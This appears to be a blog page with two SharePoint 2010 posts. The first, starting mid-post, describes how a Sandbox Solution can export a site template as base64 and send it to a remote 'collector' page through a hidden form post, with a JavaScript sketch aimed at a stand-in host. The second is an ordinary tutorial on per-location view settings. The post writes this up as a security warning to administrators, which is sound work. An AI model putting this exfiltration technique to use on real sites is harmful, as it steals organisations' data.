We have successfully managed to save the template in the Solution Gallery of the Site Collection. Now we need to access this file. I mean really access the file contents in JavaScript code. Unfortunately we can’t pass around binary data in JavaScript, so we need an alternative. Wouldn’t it be cool if we had access to a JavaScript string variable containing a base64 encoded string that represents the binary data of our freshly baked template? Yes, that would be very cool. The Web Part that lives on the Web Part page can do this for us. As part of the page lifecycle, the Web Part looks to see if the expected template file exists in the Solution Gallery (the Solution gallery is just an SPList and the template file we are looking for is just an SPFile). If the file exists, it gets the binary data of it, converts it to a base64 encoded string and renders a snippet of JavaScript that defines the string variable we are going to use in step 3. The first time the Web Part page was loaded inside the iframe the template did not exist in the Solution gallery, hence it did not render this JavaScript variable, which was also a hint to our JavaScript to initiate the creation of the template. Remember we said we have a callback in our script to notify us when /_layouts/savetmpl.aspx has completed producing our template? Excellent – because inside our callback we are going to force our iframe to refresh, causing the Web Part to output the base64 encoded string variable.

Step 3 – Send template data to a remote server
Now that we have our data available in JavaScript, how do we “send” it to the outside world? Performing AJAX calls to anything that is not on the same domain will be noticed or even blocked by the browser, so this is not an option. This is not true for regular form posts. All we need to do is create an HTML form and set its action attribute to point to a “collector page” somewhere on the internet. This page can then listen for incoming form posts, transform the posted base64 encoded string back to its binary representation and save it somewhere as an actual file. Your data has just been stolen…
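
To illustrate the idea (this is just a sketch, not the actual code from my solution; the collector URL and field name below are made up), such a form post could look something like this:

// Illustrative sketch only - the collector URL and field name are invented
function sendToCollector(base64Wsp) {
    var form = document.createElement("form");
    form.method = "POST";
    form.action = "http://collector.example.com/collect.aspx"; // remote "collector" page
    var input = document.createElement("input");
    input.type = "hidden";
    input.name = "payload";
    input.value = base64Wsp; // the base64 encoded WSP produced in step 2
    form.appendChild(input);
    document.body.appendChild(form);
    form.submit(); // a plain form post is not subject to the browser's AJAX same-origin restrictions
}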

To conclude
I don’t think there is anything technically wrong with the security model of Sandbox Solutions. The point I am trying to make with this blog post is that even though there is a lot of stuff that cannot be done from within a Sandbox Solution, there is still quite a lot of stuff that can be done, which can be seen as good or bad!

Do not blindly trust a Sandbox Solution. As Site Collection Administrators, we are still responsible when it comes to assessing and validating the trustworthiness of a Sandbox Solution and its source.

What about custom Solution Validators? You could use these to only allow certain pre-approved or signed Sandbox Solutions to be activated for example, but it comes at a price. You compromise on business agility in order to increase security. Kind of reminds me of Farm Solutions…

Written by jvossers

November 12, 2010 at 9:34 am

Per-Location View Settings in SharePoint 2010 (Views per Content Type)

with 9 comments

What’s that supposed to mean? That’s what went through my head when I saw a new link which had appeared on the List Settings page (listedit.aspx) in SharePoint 2010.

When I clicked the link, I was directed to a page where I could manage the available views per “location”.

The word “location” can have many different meanings. My initial thought was that it was referring to folders inside the list and that this page is used to configure which views are available per folder.

This turned out to be correct. I added a folder to the list and was able to make my custom view appear on there, whilst hiding it from the root of the list.

Is that all? Why call it locations when you mean folders? Well, because it does not only apply to folders!

You can configure available views for ANY NODE in the “Metadata navigation”. As a result, in addition to views per folder – depending on how you set up your Metadata navigation for your list – you can:

  • Define views that are available only on items of a particular Content Type (my favourite, demonstrated below)
  • Define views that are available only on items that have a particular value for a field of type single-value choice.
  • Define views that are available only on items that have a particular term applied to it on a field of type Managed metadata.

Let me demonstrate how to make our “Books Grouped by Author” view available only to our Book content type in our Products list, whilst hiding it for all other types of products in the list.

Below is a summary of all the steps. I will only discuss the last two steps, where we configure the Metadata navigation and the Per-location view settings, as this is what this article is all about.

  1. Create custom list Products
  2. Create content types:
    1. Book (Title, Price, Author)
    2. Movie (Title, Price)
    3. Music Album (Title, Price, Artist)
  3. Configure list to allow management of Content Types
  4. Associate Book, Movie and Music Album with list and delete Item Content Type
  5. Populate list with items for each Content Type
  6. Create view Books Grouped by Author
  7. Configure Metadata navigation
  8. Configure Per-location view settings

Once we have successfully performed steps 1 to 6, we need to bring up the Metadata navigation settings screen for our list. The link to this page can be found on the List Settings page. In the Configure Metadata Hierarchies section, we need to select the “Content Type” item in the list on the left, move it to the right and press OK.

As a result, we should now get a hierarchical navigation control on the left of our list.

Once that’s done, we need to bring up the Configure per-location view settings page. The link to this page can also be found on the List Settings page. On the left, there is a hierarchical control labelled “Location to Configure”. We need to use this to select the node (or Location if you like) to which we will be applying the configuration defined on the right. We start with the root node, which is selected by default. We don’t want our grouped view to be available at the root, so we select it in the “Views available at this location” list, move it to the “Views hidden from this location” list and press Apply. Next, we need to expand the “Content Type” node in the tree on the left and select Book. By default it is configured to inherit its settings from its parent, which is not what we want. Set this to No, and move the grouped view to the “Views available at this location” list. While we are at it, let’s move the All Items view to the “Views hidden from this location” list, so that our grouped view becomes the default view for the Book Content Type, and press OK.

Navigate to the list. When selecting Book in the Metadata Navigation on the left, the grouped view should now show instead of the All Items view. Note that the Book Content Type node in the metadata navigation is also the ONLY location where our grouped view is available.

On a final note, I noticed that the Per-location view settings link does not appear on the List Settings page when the list is contained in a Blank Site. I performed the actions above on a Team Site. Presumably certain Features need to be activated to enable this functionality; however, I currently don’t know which ones. Also, I am not sure how much of this functionality depends on SharePoint Server 2010 and whether it will work on a SharePoint Foundation installation.

Written by jvossers

December 27, 2009 at 10:13 pm

Posted in SharePoint 2010